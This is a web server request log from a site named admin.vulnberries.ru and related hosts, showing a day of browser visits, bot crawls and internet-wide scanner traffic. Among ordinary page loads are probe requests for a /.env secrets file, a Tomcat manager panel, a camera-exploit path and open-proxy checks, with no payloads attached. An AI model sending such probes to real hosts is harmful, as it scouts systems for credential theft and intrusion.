Host:
RemoteAddr: 112.124.57.72:56596
Path: /
URL: /
Method: GET
[2026-03-27 13:31:22] === HTTP Request ===
[2026-03-27 11:53:32] Login page accessed - IP: 172.30.0.12:58016
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
X-Forwarded-For: 185.62.201.193
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58016
Path: /login
URL: /login
Method: GET
[2026-03-27 11:53:32] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Forwarded-For: 74.7.244.39
From: oai-searchbot(at)openai.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51086
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-27 11:42:21] === HTTP Request ===
[2026-03-27 11:41:01] Main page accessed - IP: 34.14.59.22:33860
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.14.59.22:33860
Path: /
URL: /
Method: GET
[2026-03-27 11:41:01] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41816
Path: /.env
URL: /.env
Method: GET
[2026-03-27 10:31:48] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 135.125.74.209:49202
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-27 09:51:34] === HTTP Request ===
[2026-03-27 09:51:34] Main page accessed - IP: 85.217.140.22:40136
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.22:40136
Path: /
URL: /
Method: GET
[2026-03-27 09:51:34] === HTTP Request ===
[2026-03-27 09:11:17] Main page accessed - IP: 34.77.166.77:34904
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.77.166.77:34904
Path: /
URL: /
Method: GET
[2026-03-27 09:11:17] === HTTP Request ===
[2026-03-27 07:08:17] Main page accessed - IP: 147.185.132.40:64538
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.40:64538
Path: /
URL: /
Method: GET
[2026-03-27 07:08:17] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:43384
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-27 05:47:59] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.224.92.125:40652
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-27 05:11:09] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:56210
Path: /jars
URL: /jars
Method: GET
[2026-03-27 04:47:39] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.94:33103
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-27 03:13:40] === HTTP Request ===
[2026-03-27 03:10:51] Main page accessed - IP: 91.230.168.37:37029
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.37:37029
Path: /
URL: /
Method: GET
[2026-03-27 03:10:51] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.224:47781
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-27 01:41:34] === HTTP Request ===
[2026-03-27 01:41:34] Main page accessed - IP: 104.152.52.224:35021
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.224:35021
Path: /
URL: /
Method: GET
[2026-03-27 01:41:34] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 101.199.254.206:10141
Path: /config.json
URL: /config.json
Method: GET
[2026-03-27 00:05:36] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 101.199.254.209:33406
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-27 00:05:35] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 101.199.254.209:24358
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-27 00:05:34] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 101.199.254.207:19599
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-27 00:05:33] === HTTP Request ===
[2026-03-27 00:05:14] Main page accessed - IP: 101.199.254.234:62099
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 101.199.254.234:62099
Path: /
URL: /
Method: GET
[2026-03-27 00:05:14] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 27.115.124.41:50371
Path: /config.json
URL: /config.json
Method: GET
[2026-03-26 23:32:29] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 27.115.124.3:62083
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-26 23:32:28] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 27.115.124.5:5263
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-26 23:32:28] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 27.115.124.41:60892
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-26 23:32:28] === HTTP Request ===
[2026-03-26 23:32:09] Main page accessed - IP: 27.115.124.34:38809
===================
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 27.115.124.34:38809
Path: /
URL: /
Method: GET
[2026-03-26 23:32:09] === HTTP Request ===
[2026-03-26 23:20:21] Main page accessed - IP: 16.146.18.25:35796
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 16.146.18.25:35796
Path: /
URL: /
Method: GET
[2026-03-26 23:20:21] === HTTP Request ===
[2026-03-26 22:34:32] Main page accessed - IP: 147.185.132.73:52266
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.73:52266
Path: /
URL: /
Method: GET
[2026-03-26 22:34:32] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:56318
Path: /jars
URL: /jars
Method: GET
[2026-03-26 22:15:46] === HTTP Request ===
[2026-03-26 21:23:55] Main page accessed - IP: 64.23.214.73:45820
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.23.214.73:45820
Path: /
URL: /
Method: GET
[2026-03-26 21:23:55] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.118.227.29:40046
Path: /manager/html
URL: /manager/html
Method: GET
[2026-03-26 19:09:59] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 157.230.125.158:6998
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-26 17:16:02] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 157.230.125.158:6988
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-26 17:16:02] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 157.230.125.158:6984
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-26 17:16:02] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:50384
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-26 16:13:16] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.160:6346
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-26 15:53:14] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.186.160:6334
Path: *
URL: *
Method: PRI
[2026-03-26 15:53:14] === HTTP Request ===
[2026-03-26 15:53:12] Main page accessed - IP: 66.132.186.160:6322
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.160:6322
Path: /
URL: /
Method: GET
[2026-03-26 15:53:12] === HTTP Request ===
[2026-03-26 14:27:04] Main page accessed - IP: 178.128.115.151:59014
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.115.151:59014
Path: /
URL: /
Method: GET
[2026-03-26 14:27:04] === HTTP Request ===
[2026-03-26 14:14:36] Main page accessed - IP: 209.38.18.27:40912
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 209.38.18.27:40912
Path: /
URL: /
Method: GET
[2026-03-26 14:14:36] === HTTP Request ===
[2026-03-26 14:10:58] Login page accessed - IP: 172.30.0.12:36874
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Referer: https://admin.vulnberries.ru/
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
X-Forwarded-For: 185.62.201.193
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36874
Path: /login
URL: /login
Method: GET
[2026-03-26 14:10:58] === HTTP Request ===
[2026-03-26 14:10:58] Main page accessed - IP: 172.30.0.12:36874
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
X-Forwarded-For: 185.62.201.193
Upgrade-Insecure-Requests: 1
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36874
Path: /
URL: /
Method: GET
[2026-03-26 14:10:58] === HTTP Request ===
[2026-03-26 14:09:04] Main page accessed - IP: 176.65.149.45:46536
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:46536
Path: /
URL: /
Method: GET
[2026-03-26 14:09:04] === HTTP Request ===
[2026-03-26 13:38:15] Login page accessed - IP: 172.30.0.12:51040
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 185.62.201.193
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
Priority: u=0, i
X-Forwarded-Proto: https
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: navigate
Referer: https://admin.vulnberries.ru/login
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51040
Path: /login
URL: /login
Method: GET
[2026-03-26 13:38:15] === HTTP Request ===
[2026-03-26 13:38:14] Login page accessed - IP: 172.30.0.12:51040
===================
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Priority: u=0, i
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-User: ?1
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 185.62.201.193
Upgrade-Insecure-Requests: 1
X-Forwarded-Proto: https
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51040
Path: /login
URL: /login
Method: GET
[2026-03-26 13:38:14] === HTTP Request ===
[2026-03-26 13:38:13] Login page accessed - IP: 172.30.0.12:51040
===================
X-Forwarded-Proto: https
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 185.62.201.193
Referer: https://admin.vulnberries.ru/login
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51040
Path: /login
URL: /login
Method: GET
[2026-03-26 13:38:13] === HTTP Request ===
[2026-03-26 13:38:12] Login page accessed - IP: 172.30.0.12:51040
===================
Sec-Fetch-User: ?1
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 185.62.201.193
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
Priority: u=0, i
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/login
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51040
Path: /login
URL: /login
Method: GET
[2026-03-26 13:38:12] === HTTP Request ===
[2026-03-26 13:38:11] Login page accessed - IP: 172.30.0.12:51040
===================
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Referer: https://admin.vulnberries.ru/login
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
X-Forwarded-For: 185.62.201.193
Via: 2.0 Caddy
Sec-Fetch-User: ?1
Sec-Ch-Ua-Mobile: ?0
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51040
Path: /login
URL: /login
Method: GET
[2026-03-26 13:38:11] === HTTP Request ===
[2026-03-26 13:38:10] Login page accessed - IP: 172.30.0.12:51040
===================
X-Forwarded-For: 185.62.201.193
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/login
Priority: u=0, i
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "YaBrowser";v="26.3", "Yowser";v="2.5"
Accept-Language: ru,en;q=0.9,bg;q=0.8,ba;q=0.7
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 YaBrowser/26.3.0.0 Safari/537.36
Sec-Fetch-Mode: navigate
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51040
Path: /login
URL: /login
Method: GET
[2026-03-26 13:38:10] === HTTP Request ===
[2026-03-26 13:37:37] Login page accessed - IP: 172.30.0.12:51040
===================
Sec-Fetch-Site: same-origin
